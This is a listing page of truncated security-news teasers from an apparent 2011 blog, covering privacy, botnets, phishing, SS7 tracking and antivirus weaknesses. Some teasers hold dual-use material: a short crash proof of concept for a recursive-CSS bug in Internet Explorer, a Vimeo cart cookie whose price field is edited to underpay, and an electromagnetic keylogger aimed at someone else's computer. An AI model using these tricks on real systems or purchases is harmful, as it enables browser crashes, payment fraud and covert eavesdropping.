

The Mozilla community has once again announced its vision of user anonymity on the web. It is possible that in early 2011 Firefox will get a "no trace" button. At least, so says Gary Kovacs, executive director of Mozilla Corporation. He also says he absolutely agrees with the many users who say that the "traces" left on the web need to be kept under control.

The Mozilla community is also concerned about the methods of online advertising agencies and networks, which by hook or by crook try to get any information they can about the user in order to show advertising that best matches the user's interests. Clearly, these companies gain more clients as a result, but such methods are already on the verge: a little more, and all this could be called theft of information.

Worst of all, users cannot control their own "footprints" on the Internet; the concept of "anonymity on the Internet" is becoming ever more elusive.

It is interesti ...
Views: 56749 | Added by: w1zard | Date: 15.03.2011 | Comments (731)



Well then, dear Habr reader: while you used to run into all sorts of swindlers working on faceless passers-by in the subway or at the train station, more recently they have mastered computers, electronic databases, color printing and other conveniences, and now send personalized paper spam: color brochures and promotional material designed for you personally (and for your parents) land in your mailbox in the entrance hall, with all your details, names and so on, to win your trust. What should you expect from well-equipped spammer-swindlers? How do they make money, and how can you protect yourself from them? Consider the following example. (Caution: photos, heavy traffic.)



So, we received another letter. It is not the first one this year. Let's open it and look.


Envelope Front


Envelope rear

We see the recipient's real address and name, but notice immediately that all postage s ...
Views: 5594 | Added by: w1zard | Date: 15.03.2011 | Comments (19)

Back in the summer, in August to be precise, it became known that Intel wants to buy the antivirus company McAfee. The transaction value is quite high: $7.68 billion. U.S. antitrust regulators immediately took notice of the deal and began to check its legality, as happens in such cases. Incidentally, this deal is the largest in Intel's history.

The corporation agreed to buy McAfee to expand its influence in the rapidly growing network security market segment. Today it became known that the Fair Trade Commission has approved the transaction, so it will be completed shortly. However, there is another hurdle, the European antitrust regulators, but the Europeans often wait for the decision of their American colleagues and then make a similar decision.

Analysts believe that the review of the transaction by the European legislator should not pose any particular problems, so very soon McAfee will actually come under Intel's control. Naturally, after the completion of th ...
Views: 1369 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

The famous cryptologist, author of bestsellers on cryptology and developer of the Blowfish and Twofish ciphers has become interested in human psychology. Bruce Schneier believes that to create good computer security systems one needs to study the brain of Homo sapiens very carefully, namely the neocortex and the amygdala.

Next week Bruce Schneier will speak at the RSA conference and talk about his latest research and thinking on the connection between psychology and computer security. The talk promises to be quite interesting.

The cryptography guru himself explains that the subject of his talk will not be practical methods of cryptography or computer data security at all, but rather reflections on how people think and how they feel about computer (and not only computer) security. It really is a serious psychological problem worthy of medical investigation.

"A lot of the time at RSA we are trying to understand why people do not protect their computers, why they behave so irrationally. This c ...
Views: 1066 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Where there is a smoker, there is an open door. The total ban on smoking in offices forces nicotine-dependent geeks to run out into the street, and the back door is left open for them. According to British specialists, social hackers can use this "hole".

The British consulting firm NTA Monitor, which specializes in IT security, conducted an experiment in which a hacker easily entered a corporate building through a back door that had been left open specifically for smokers. Once inside, the attacker used social engineering techniques to get into a meeting room. The company's staff escorted him there and left him alone.

The hacker did not need a pass to get into the building. He simply waited until the smokers' break was over and then went in through the same door. A few minutes later he was able to connect his laptop to the corporate VoIP network directly from the meeting room. Fortunately, the company's data network was separated from the VoIP network, so that unauth ...
Views: 1159 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

This question is currently asked by anyone who has resources on the Internet hosting their own work (original content).
I have been asking myself the same question since the beginning of 2006, when clones of my work began to appear on the web.

The first clone was a menu (which I made for the first version of my portfolio) on the site of a certain DJ, who stole the whole menu in the most brazen manner, not even bothering to change (Flash developers will understand me) the colors, the masks, the algorithm, or even the bugs. The incident was later resolved quite peacefully, by adding my copyright and a link to my site.

After that there were several similar clones of works from my blog, but frankly I did not want to get into it, because the traffic of those resources was insanely small, and I had no energy for disputes: it was summer, after all!

2007 brought an absolutely stunning (to me) surprise.

March 3. About six o'clock in the evening.
The ICQ ...
Views: 1137 | Added by: w1zard | Date: 15.03.2011 | Comments (2)

Not so long ago, at the beginning of December to be precise, a bug in the recursive processing of CSS in various versions of IE was disclosed. The published PoC could only crash the browser, and nobody managed to get anything more meaningful out of it until the start of this week, when an exploit making full use of this vulnerability appeared in Metasploit.

The PoC originally looked like this:
<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>

<code of css.css>
* {
color: red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>

The bug is a memory corruption in the HTML page parser (mshtml.dll): when processing pages containing recursive CSS includes, the object CStyleSheet::Notify is removed, and later this memory area can be used to transfer control to arbit ...
Views: 1150 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

The attack on the root DNS servers recorded in early February may have been a kind of advertising stunt. The "advertisers" demonstrated their capabilities in organizing large-scale attacks using botnets. This version was put forward in a special document by representatives of ICANN, the organization responsible for assigning domain names, according to the website Darkreading.com.

David Ulevitch, CEO of the DNS services OpenDNS and EveryDNS, agrees that the advertising-campaign version looks very interesting: "ICANN representatives have suggested that this could be someone trying to demonstrate the power of his botnets and the ability to use them to order. This is not a test attack in preparation for a global action against the DNS servers themselves, but a way to demonstrate the potential of botnets to those who can use this potential against less protected targets." According to Ulevitch, a new similar attack is possible, but it is unlikely to destabilize the operation of servers ...
Views: 1056 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

EM-SEC Technologies of North Carolina has issued a press release reporting successful tests of a material developed by its technology division. EM-SEC 2060, as the product is called, is a special paint that, applied to the walls of rooms or buildings, shields them from the electromagnetic radiation of wireless communications: cellular or, for example, Wi-Fi.

The key component of the EM-SEC 2060 coating, which in appearance and properties differs little from ordinary water-based emulsion paint, is a complex polymer whose formula and manufacturing technique are, for obvious reasons, a trade secret.

The coating is intended primarily for the information-security-critical facilities (SCIF) of private companies and public (including military) bodies. The methods of industrial espionage, not to mention "real" espionage, have long made it possible to intercept information even from cable networks, and the theft of data from Wi-Fi channels has become a kind of urban legend, a horror story for IT-Schnic ...
Views: 1028 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

This year's ShmooCon hacker conference delighted visitors with an arsenal of unusual devices that they could operate themselves. Take the Silica device, based on the Nokia N800: it automatically scans surrounding Windows computers via WiFi, identifies vulnerable PCs and lets you take screenshots from any of them in a couple of mouse clicks (and not just screenshots).



Silica gadgets sell for $3600 and are going like hot cakes, according to the developers at the company Immunity. The price includes the base Nokia N800 unit, a pre-configured set of programs with updates for a year ahead, and a two-hour course on using the device.

A "wireless hacker" may find very useful the WiFi signal amplifier from WarDrivingWorld.com, with which you can connect to a hotspot from as far as three miles away. The $325 package includes a 100-milliwatt 802.11b/g card, a 500-milliwatt amplifier and a 9 dBi antenna.



Among the exhibits you could find a device t ...
Views: 1029 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

In the description of the Wikileaks app in the Apple Store, I promised customers to transfer $1 from each copy sold as a charitable payment in support of a free Internet.

One Dollar For Internet Freedom

Internet democracy requires funds to stay strong. By purchasing the Wikileaks app, you donate one dollar of the purchase price towards organizations that work to promote the future of online democracy.
Your donation may be used to fund defense costs of high profile individuals in the event they will be charged for espionage or crimes related to the leakage of confidential documents.
The Wikileaks app and its designers operate independently of Wikileaks and Apple.


I did not get the money from Apple, but to complete the experiment I decided to make the charitable transfers from my own funds.

In the comments to this article on Habr I received a proposal from the Habr user SMiX to check the transfer through the



How it managed ...
Views: 803 | Added by: w1zard | Date: 15.03.2011 | Comments (1)

When Lenta.Ru reported in early February 2011 that twelve Somali illegal immigrants had been detained in the Netherlands on charges of planning terrorist attacks, some readers were alarmed by the mention of the technology behind the arrest. It was in fact publicly stated that officers obtained information about the whereabouts of the illegal immigrants using the GPS modules in their cellphones: a message was sent to the immigrants' phone numbers and processed without the owners' knowledge, after which the phones (again unbeknownst to their owners) automatically sent back an SMS showing the location of the handsets. Judging by the fact that the detentions were made in seven different places, this technology must have worked on seven phones (out of a maximum of twelve), so it is certainly widespread.

It turns out:

1) From an SMS center legally connected to the global SS7 network, with a simple MAP query and knowing only a phone number, you can find out the IMSI (nu ...
Views: 1007 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

In the hackers' competition for the largest number of zombie PCs under control, the bots Sdbot and Gaobot are in the lead. As reported by the antivirus company PandaLabs, these two bots were responsible for 80% of all new infections in the first quarter of 2007. Oscarbot, IRCbot and RXbot follow a long way behind the leaders.

"The reasons for this dominance lie not so much in any special properties of Gaobot or Sdbot, but simply in the fact that their code is the most prevalent on the Internet," explains Luis Corrons, technical director of PandaLabs. "This means that any criminal who wants to make a bot can simply take the source code for these threats and make any changes of his choice. This really saves them time and effort."

Bots are worms or Trojans that install themselves on computers to automatically perform certain actions, such as sending spam, turning the computers into "zombies". Botnets, networks of computers infected with bots, have become a lucrative business model. There i ...
Views: 714 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

The Philippine government has appealed to hackers to break into its online voting system. The system will be tested during trial elections from 10 to 30 July. The Philippines and some other countries are trying to repeat the success of Estonia, which was the first in the world to hold full-fledged Internet elections.

The online voting system for the Philippines was developed by the Spanish company Scytl Consortium at a cost of $452 thousand. During the testing, 26,893 registered voters will answer the questions of an online questionnaire that is meant to imitate the process of selecting candidates in a real election.

The developers of the system and the Philippine authorities have asked the International Organization of electoral systems to bring "professional hackers" into the testing of the online system.

The Spaniards are confident that their product is completely secure and will withstand any attack. The computer system is now also being introduced for online voting in ...
Views: 687 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

A hacker with the nickname Zoz spoke at the Defcon 18 conference with a 20-minute story about how he managed to track down his desktop computer, stolen a year earlier. The story is really unusual (presentation slides, video (see 3:15)).

For months Zoz doggedly watched for his serial numbers to turn up at some auction, but to no avail. His account at the DynDNS service (dynamic binding of a domain to an IP address) showed no signs of life either. After 30 days the service sent a letter saying that to keep an inactive account one needs to buy an upgrade to the Pro version. In October 2009 Zoz did so, and luck turned to face him.

On May 7, 2010 a strange record appeared in the DynDNS account.



Zoz made a request to the DNS ...



then successfully logged into his own computer over SSH.



Then the most interesting part began. On his own Mac OS X desktop he immediately discovered a few new files and folders. There was the game Realm of Warfare, files of an application for unemploy ...
Views: 795 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

German scientists have learned to reconstruct documents destroyed by shredders with the help of sophisticated computer algorithms, and have decided to use this to restore classified documents of the East German secret police.

When the Berlin Wall fell in 1989 and it became clear that the East German regime was finished, Stasi employees tried to destroy all human intelligence materials with shredders.

About 16,250 bags containing about 45 million shredded documents were found and confiscated after the reunification of Germany in 1990. Work to restore the documents began 12 years ago, but 24 people have managed to recover the contents of only 323 sacks. At that rate, restoring all the documents would take 30 people from 600 to 800 years.

The researchers hope to recover the documents from 400 bags in 2 years using new computer technology proposed by the Fraunhofer Institute.

If the search project, for which the state has allocated $8.53 million, ...
Views: 691 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

It is 2007, and last year malicious software already reached record levels of growth and technological sophistication. Many of us have been exposed to spyware, viruses, worms and other malicious programs first-hand, and have therefore wisely decided to take appropriate steps to protect ourselves.

Even those who have escaped infection are seriously turning to measures to stay safe on the Internet. Everyone needs reliable protection that covers as many risk areas as possible and can protect your network without getting in the way of work.

But where should you focus your search for security: on an antivirus, a firewall, an integrated solution, or something else? Agnitum explains how to choose the best combination of tools to counter modern threats. This article for the newsletter "In the world of security" was written to help you make an informed choice; with short videos and simple descriptions, we show how modern malware infects a computer, and show ...
Views: 669 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

A very controversial law was adopted on Monday by the deputies of the German Bundestag. Following the path of gradually tightening the articles of the Criminal Code against cybercrime, the legislators have done what information security experts feared: they went seriously too far in imposing bans and almost completely erased the line between the "white" and "dark" sides of the computer underground.

The quite reasonable provision on the illegality of, and criminal liability for, any action to circumvent information protection by unauthorized persons is complemented by confusing new rules banning the development, reproduction, distribution, installation and use of any software that can be used for such actions. That is, in Germany one can no longer test the strength of security without the risk of landing in jail.

The law, according to specialists, is as foolish as a law against the acquisition and use of, say, forks. They too can cause serious harm to a person (and with a certain skill - and ...
Views: 654 | Added by: w1zard | Date: 15.03.2011 | Comments (0)



The U.S. president really does have this right, and the most unusual thing about the whole situation is that Congress granted these rights to the country's leader at a time when nobody even dreamed of the Internet or computer networks. The fact is that in 1942 Congress gave the U.S. president the right to manage telephone or telegraph networks in the event of "difficult" situations that threaten national security. From the wording of the law we can see that it applies to almost any means or centers of wire communications. This summer the administration of the current U.S. president said that he was going to use the almost forgotten law in the event of an emergency.

Some analysts even concluded that the president could "turn off" the Internet in one fell swoop, which other experts consider plain nonsense. Nevertheless, the U.S. Congress is going to take away from the president the right to manage computer networks, "out of harm's way", as they say.

In principle, now the U.S. government fin ...
Views: 647 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Security experts have discovered new evidence of the war being waged between the owners of the Srizbi and Storm Worm botnets. Like the mafia groups in "The Sopranos", the hackers are redividing their spheres of influence. The only difference is that the criminals of the virtual world are fighting for control over tens of thousands of infected computers, and the weapons in this war are not machine guns but Trojans.

The trojan called Trojan.Srizbi, part of the MPack attack kit, is the latest addition to the hackers' arsenal. It not only infects a computer and makes it part of a botnet, but also tries to destroy its main competitor, another trojan, Storm Worm.

This is another episode in the war between the two botnets. Recently, bots from the Storm Worm network DDoSed a Srizbi production server that was used to spread malware. The server was put out of action for a day. Security experts observed this attack and said that during the day they could not get through to it, to ...
Views: 768 | Added by: w1zard | Date: 15.03.2011 | Comments (0)



A situation where one spouse reads the other's SMS or e-mail is almost normal; this refers to cases where a husband or wife suspects the other of infidelity and tries to verify it by looking for "compromising material". There are hundreds if not thousands of jokes about such situations and, in general, society does not consider such cases anything out of the ordinary. But an interesting trial is now under way in the U.S., and its outcome may well become a judicial precedent. The situation would be completely anecdotal if it were not so serious.

The accused, 33-year-old Leon Walker, regularly read his wife's e-mails, having learned the password to her Gmail account. One has to think that finding out the password to the email, instant messenger or social network account of one's other half is no big problem. Walker waited until his wife left the house and sat down to check her email. In the end, his wife noticed something was wrong, a scandal followed, and not just that - it we ...
Views: 1941 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Apple, AT&T and accessory makers are not the only ones enjoying the hype around the iPhone. Virus writers and scammers have also found a way to profit from the situation. They have already managed to create a botnet out of users who wanted to buy themselves the new "wonder device" from Apple.

PandaLabs this week detected a botnet of 7.5 thousand computers (the number is constantly growing) infected with a trojan called Aifone.A. Users of these PCs who tried to buy an iPhone from the site iphone.com, owned by Apple, were redirected to a fake site imitating the iPhone site. If users ordered an iPhone through the fake site, their bank or credit card information fell into the hands of the fraudsters.

"This is one of the most sophisticated attacks aimed at a specific community, this time iPhone buyers," said Luis Corrons, technical director of PandaLabs. "It's a really complex, dangerous attack that combines elements of malware (tro ...
Views: 668 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Specialists have reported unusual behavior of Windows XP and Vista in recent days. Some systems began, on command, to update system files in the middle of the night, bypassing the usual auto-update process. The files are updated even if Automatic Updates is turned off. The Windows Update (WU) program assumed full authority and, without any dialogue with the user, replaced nine files on its own.

Generally speaking, this is a very significant event. If Microsoft makes the forced update procedure standard, the entire security strategy for personal computers will need to be reviewed. A self-updating PC is not entirely under its owner's control.

Of course, Microsoft does this for the users' security, but treating users like a herd of sheep is rather insulting. In addition, by implementing such a global update procedure for systems in a homogeneous environment, the company itself becomes a source of potential danger.

Under OS XP SP2 update ...
Views: 740 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

One winter morning a colleague said that the Presenting Vimeo Plus page shows a different subscription price in different browsers: $49.95 and $59.95. The suspicion immediately crept in: why does Vimeo price its annual subscription so strangely? Meanwhile, on my machine all browsers showed the same amount.

After a little research, we realized that the price is stored in a cookie named 5vimeo_cart:

%7B%22item_class%22%3A%22AccountFeatures%22%2C%22user_for%22%3Anull%2C%22item_identifier%22%3A1%2C%22name%22%3A%22Vimeo+Plus%3Cimg+src%3D%27%5C%2Fassets%5C%2Fimages%5C%2Ficon_plus_tiny.png%27%5C%2F%3E%22%2C%22cost%22%3A59.95%7D

The reasons for such different prices were not established. As an experiment, we decided to try changing the value and buying a one-year subscription. A suitable card with $4 in the account happened to be at hand for this (there was nothing to lose; more than that could not have been charged anyway). Change the ...
Views: 713 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Just received the following letter:

Dear Customer,

According to paragraph 4.6.2.5. Terms of Use Yandex.Money, your account is blocked.
Need an account reactivation in the system.

To reactivate, follow this link: https://money.yandex.ru/login.html

or contact one of our operators:
PS Yandex LLC. 101000, Moscow, st. Vavilova, 40
tel.: +7 (495) 739-23-25
PS Yandex LLC, St. Petersburg branch. 191123, St. Petersburg, ul. Radishchev 39, tel.: +7 (812) 334-7750

Letter generated automatically, do not respond
Best regards, PS Yandex

The letter was sent in HTML format. If you click the link you land on the page http://pornos-de.com/money.ya.ru/Index.h ..., which is a replica of the Yandex main page. Under no circumstances enter your data there.

Be careful.

If you open this page, Firefox warns that it is dangerous. Apparently kind people have already flagged the site as potentially dangerous for users. By the wa ...
Views: 807 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Translation of an article from the site rootkit.com

Preamble

Kaspersky Anti-Virus is one of the most technically advanced antivirus products today. It can even deal with certain types of viruses while they are alive and trying to attack.

It has a proactive defense module (Proactive Defence), a partial implementation of HIPS, which is in theory capable of protecting your computer from unknown threats by analyzing program behavior and preventing unauthorized actions.

That is all theory and advertising slogans. In reality the situation is very different. There are many viruses that the antivirus does not detect, and its proactive protection can be suppressed so that an attacker can load his own driver, after which any proactive protection is simply useless.

This article is not just a review of errors and vulnerabilities: at the end of each part we give advice to the antivirus developers, because we see that they cannot deal with these mistakes themselves. ...
Views: 831 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

As reported by the Associated Press, on Monday Donald Kerr, who since October has been the Director of National Intelligence in the Office of the President of the United States, said that society needs to reconsider the definition of such an important democratic freedom as privacy. "Privacy no longer can mean anonymity," said Kerr, adding that protecting citizens' correspondence and financial information from falling into improper hands should be the job not of the citizens themselves but of government and business. It is implied, of course, that the hands of the CIA and NSA are not among the improper ones.

The discussion was raised again in the U.S. Congress during the renewed consideration of amendments to the Foreign Intelligence Surveillance Act (FISA), which the Bush administration has been trying to push through for several months. The administration needs the amendments to extend the almost unlimited powers that were given to U.S. "security officials" in the famous USA PATRIOT Act after the attacks of Septem ...
Views: 649 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Tor, the most secure network of anonymous servers, turned out to be not so secure. Two months ago a scandal erupted in Sweden when the actions of a well-known IT security consultant, 22-year-old Dan Egerstad, became known. He filtered Tor traffic and posted on his blog logins and passwords to mailboxes and servers belonging to embassies, NGOs, commercial firms and government agencies in different countries. Among the victims were the embassies of India, Russia, Uzbekistan, Kazakhstan and Iran, as well as the British representative office in Nepal. Anyone could log in to these accounts and read the mail.

That article became a sensation. Now the story has a sequel. On a tip from U.S. authorities, Swedish police shut down Dan's blog, searched his apartment and confiscated equipment, and released him after two hours of interrogation. Dan is still at large and is giving interviews explaining his position. He is sure he has not violated any laws, but it already seem ...
Views: 683 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

German police are unable to intercept and decipher Skype traffic in order to wiretap the calls of suspected criminals and terrorists. Joerg Ziercke, president of the National Police headquarters in Germany (BKA), complained about this to reporters at the annual meeting of law enforcement representatives and security professionals, according to Reuters.

This situation does not suit the police, for whom wiretapping phones long ago became a standard tool of operational work. Naturally, the security forces are not going to give up such an effective tool and are now looking for a way out.

Experts say that VoIP telephony is by its nature more difficult to intercept because the information is transmitted as packets across the network along an unpredictable route rather than over fixed lines, as in conventional telephony.

Joerg Ziercke said they had not approached Skype's management to ask for help in solving this problem. "I do not think it will help" - ...
Views: 645 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

The article deals with one information security issue: combating successive mailings, also called "chain letters" after their handwritten prototype. The first such messages, called "heavenly" or "holy letters" (Himmelsbriefe), appeared in the Middle Ages. However, we will not digress from the topic and will consider the threat of "chain letters" from the perspective of information security:

The hidden danger of "chain letters" and similar successive mailings



Many understand that such mailings put a parasitic load on corporate equipment and communication channels. This is indeed the case, but it is not the biggest danger: creating such a chain is one of the mechanisms by which spammers obtain an accurate database of addresses. An even greater danger lies in "exposing" the staffing structure of enterprises, which allows attackers to use this information for a variety of purposes. But the biggest risk at all ...
Views: 797 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

A wicked hacker like you has, of course, dealt with software keyloggers more than once. Run such a program once on the enemy's machine and you're done: consider all the passwords and typed text already yours. However, this approach has a drawback: you have to somehow start the program on another computer, which is not always possible. Therefore, we decided to make an elementary device with which you can log everything typed just by coming close to the enemy's computer.

The essence of the idea and method
Let me briefly explain what will be discussed. Every current-consuming device, be it a television, mouse, keyboard, hard drive or cooler, creates an electromagnetic field around itself during operation. Its appearance, as we know from the physics course, is directly related to currents of different voltages passing through the wires and traces of printed circuit boards. The magnitude of these electromagnetic waves can be measured with special devices. Field often crea ... Read more »
Views: 598 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Oak Ridge National Laboratory (ORNL) has come under a complex and subtle attack over the Internet, its director Thom Mason admits. The attackers acted in a very sophisticated way: fake emails with malicious attachments were sent to several people whose computers were connected both to the World Wide Web and to the lab's internal networks. One wrong action, and the intruders gained access to a database of everyone who had been at Oak Ridge over 14 years starting from 1990.

After receiving and analyzing this information, the hackers began sending targeted letters to the "weak links" in the laboratory's defense: people with a fairly high level of access to the LAN from their computers. Having made about 1,100 attempts with 7 different versions of letters, almost indistinguishable from ordinary internal correspondence, they got "at least 11 employees" to open the dangerous attachments and give them access to even deeper secrets of the laboratory.

How serio ... Read more »
Views: 606 | Added by: w1zard | Date: 15.03.2011 | Comments (0)


Did you know that from January 29 to February 5, 2008, ROCIT and Microsoft are holding Runet Safety Week?

Maybe I'm a bit late with my note, but a summary of the event, which consists of 2 main parts, is still worth giving.

So, Runet Safety Week opened with a press conference and the round table "Internet for Children: Prospects and threats?..", held at RIA Novosti. The round table was led by Ilmira Malikov and Sergey Plugotarenko. The topics discussed during the event:
  • Role of society and the state in ensuring the safe use of the Internet for children
  • Ensuring the safety of children on the Internet, software solutions, specialized Internet portals
  • International experience against malicious content and its impact on children
  • Health and safety of children on the Internet: understanding the problem or the solution?
  • International experiences and approaches of limiting children's access to harmful Intern ... Read more »
Views: 645 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Chris Rouland, one of the heads of IBM Internet Security Systems, the Big Blue division that searches for and combats information security threats, said that his colleagues at other companies in the same field deliberately hide information about the vulnerabilities they find. He drew this conclusion from strange statistics that came to light during preparation of the annual X-Force report. In 2007, the report said, for the first time in 10 years, 5.4% fewer gaps in the protection of computer systems were found than in the previous year.

Rouland believes that a developed black market for vulnerabilities exists, in which computer security experts sell them both to criminals and to the authors of the software. The goal of the latter is as clear as that of the former: no one wants to risk their reputation or draw attention to their miscalculations, preferring to fix them quietly. High profitability of such a "business model" for research firms makes it virt ... Read more »
Views: 567 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

According to network security experts at McAfee, in 2011 hackers will pay maximum attention to mobile devices, URL shorteners, geolocation services such as Foursquare, and Apple products, which hackers have so far almost never touched. "Social services and mobile web applications are becoming more popular, which makes them very attractive to hackers," says Vincent Weafer, vice president of McAfee Labs.

In principle, the McAfee experts' prediction is quite logical: Internet services and mobile software are themselves becoming better and smarter, gaining functionality. The users of all this are also becoming more and more numerous, and attackers simply cannot ignore such a wide field of activity. Take URL shorteners: who would have thought that intruders might be interested in them? Yet today they are one of the most popular tools for criminals.

According to the same experts, social networks will remain hot "theme" of network intruders, but the ... Read more »
Views: 529 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Before reading this article, I would recommend getting acquainted with the basic terms of the technology: http://ru.wikipedia.org/wiki/BitTorrent
Basic knowledge of the Perl language is also desirable.

Today the BitTorrent protocol is at the peak of its popularity. Hundreds and thousands of terabytes per second rush to peers over fiber optic backbones and radio channels. Millions of files (torrents) appear on the tracker. What can prevent this?

In this article I want to discuss and show the excessive openness and simplicity of the message exchange between the tracker and the BitTorrent client. Perhaps this cannot be called a vulnerability, because it poses no real threat to the server or the client, but it can undermine the functioning of the network and dramatically reduce the overall upload rate. It's no secret that the indicator of a user's activity on a tracker is the ratio. The lower it is, the greater the restrictions imposed on the user. A very low ratio may be grounds for deleting the account. This is especially important in networks usin ... Read more »
Views: 10005 | Added by: w1zard | Date: 15.03.2011 | Comments (9)

Today an old friend from my institute wrote to me and asked me to lend him money. Under the cut is the ICQ history (Ivanov is him, Tony Clifton is me). Nothing new in this, but still, beware ...


Ivanov (17:06:00 6/03/2008)
hello, can you lend me some webmoney?

Tony Clifton (17:06:17 6/03/2008)
Lately everyone seems to want webmoney from me

Ivanov (17:06:29 6/03/2008)
:-) will you lend it? I'll return it Saturday, 25-30 VSW

Tony Clifton (17:08:21 6/03/2008)
No VSW - there is only WMR and Yandex

Ivanov (17:11:15 6/03/2008)
Can you send GIR? 1000 should be about 900 rubles

Tony Clifton (17:11:27 6/03/2008)
1000 should be about 900 rubles? how much money do you need?

Ivanov (17:11:40 6/03/2008)
Can you send 1000?

Tony Clifton (17:11:47 6/03/2008)
I, and 1000
and the wallet?

Ivanov (17:12:04 6/03/2008)
R420344696559

Tony Clifton (17:13:02 6/03/2008)
What was the name of the math teacher in 1st year? first name

Ivanov (17:13:18 6/03/200 ... Read more »
Views: 648 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Georgia Tech has developed a prototype program, BotSniffer (research paper in PDF), which can find botnets on its own by analyzing the network activity of individual computers on the network. The program identifies patterns characteristic of infected zombie PCs, then infiltrates their network and reaches the botnet's command-and-control (C&C) server. Typically the C&C server operates over IRC or HTTP, and BotSniffer supports both modes.

BotSniffer needs no signature database or IP address list to get started. It detects bots and finds C&C servers even if the traffic between them is encrypted. The point is that all bots exhibit the same behavior: at the same moment they all begin either to send information or to scan the network. The program detects these patterns. Then the transmission of commands over the network can be quickly blocked, that is, the botnet can be neutralized. The researchers explain that the mechanism of transmission of ... Read more »
Views: 1199 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

At the Black Hat conference a new method of cracking GSM encryption was shown, notable for its simplicity and low cost. It requires equipment costing only $1000 and about half an hour to decode the signal and find the keys.

Thanks to the work of two young specialists, David Hulton and Steve Muller, remote wiretapping of GSM phones will soon be available not only to intelligence services but to every citizen. The inventors used a long-known vulnerability in the standard protocol. According to Muller, GSM protection was broken back in 1998, when theoretical papers on the topic were published. They simply implemented the "exploit" in practice.

In March of this year, Hulton and Muller plan to launch a fast version of their spy system that would break the protection in just 30 seconds. True, such a system will cost at least $200 thousand. Hulton and Muller have protected the design with a patent.

For comparison, currently special services for the p ... Read more »
Views: 609 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Antivirus companies have reported a new trend in the spread of viruses. After the waves of e-mail and script viruses, USB sticks are now one of the most popular ways of spreading malicious programs. This was made possible by a weakness in Windows, which by default automatically runs the autorun.inf file from a removable drive.

Viruses that spread this way (via INF/Autorun) first showed themselves in June 2007, when, according to statistics from ESET Software (developer of NOD32), their share rose to 2.17% of the total number of registered viruses. To date, that is in just nine months, the share of such viruses has increased to 10.3%.

Among the most popular viruses in March 2008 are the pop-up generator Win32/Adware.Virtumonde (distributed via USB sticks), which is very difficult to remove, and Mebroot, which uses the classic technique of writing to the MBR and stores its data in hard disk sectors rather than in files, which complicates its detection, even when ... Read more »
Views: 598 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

Quite strange things are happening these days, gentlemen. I was recently looking at the statistics of one of my projects in Rating@Mail.ru and came across this interesting thing:



I scratched my head and thought a little: well, a few stray bugs, it happens. But then curiosity got the better of me, and I went to look at the open statistics of my neighbors ...



Finally, after ten minutes of surfing, I realized that almost all my neighbors in the rankings, almost all of my side projects, and my friends' projects have such a request. Digging deeper, it turned out that the statistics showed not only stray requests but also a page that altogether smacks of delirium:



The link that I found is, for the time being, a site offering licenses for JBC v3 and SPAM DirectMailer for sale. Tech support suggested that the resource owner had put my counter on his own site, but really? Why would a site whose daily traffic is significantly higher than that of my small candle factory need my counter?
... Read more »
Views: 620 | Added by: w1zard | Date: 15.03.2011 | Comments (1)

This habratopic is food for thought for users of the popular download client FlashGet. Apologies for the lack of job options, but Habr is being somewhat buggy.

To search for malware and control it I use Symantec products. And just yesterday I ran into the problem that NIS started cursing at FlashGet. I searched online a bit and, as a result, can summarize:
1. Multiple messages to support from users saying that the antivirus on their computers was detecting Trojans in the FlashGet directory.
2. Panic online about the FlashGet program.
3. The main symptom is the appearance of files named:
  • inapp4.exe
  • inapp5.exe
  • inapp6.exe

   detected by Kaspersky Antivirus as:
  • Trojan-Dropper.Win32.Agent.exo
  • Dropper.Win32.Agent.ezo
  • Trojan-Downloader.Win32.Agent.kht
4. No other Trojan programs through which these files could have gotten into the system were detected.
5. The audit revealed that in addition to the Tr ... Read more »
Views: 686 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    At Security @ Interop, an event unfairly overlooked by many infosec people, one could pick up the pilot (April) issue of the magazine C'T-Russia, which I gladly did. Now it is being passed from hand to hand around the whole company.

    In C'T I found a very interesting and thoughtful comparative test of 15 antivirus programs. I have finally gotten around to "processing" this very "tasty" content. I will cite here only the introductory part, the methodology and the conclusions. This is exactly the kind of comprehensive analysis on the basis of which it has recently become fashionable (and now possible) to scold or praise the products of different vendors.

    I think that for the team of a new magazine on computer technology, such a comprehensive test is a great bid for leadership, because the tests are no worse than those conducted by Neil Rubenking of PC Magazine USA. Now there is something to read in Russia too: testing done with their own hands, described in plain language and fairly submitted that tog ... Read more »
    Views: 546 | Added by: w1zard | Date: 15.03.2011 | Comments (0)

    Just two publications caught my attention today. One of them is already dated April 30, but who reads CW these days?

    So: "An outpost against viruses" by Dmitry Zhelvitsky, special correspondent of Open Systems in St. Petersburg, and "Interview with Mikhail Penkovsky, commercial director of Agnitum" on my beloved Anti-Malware.

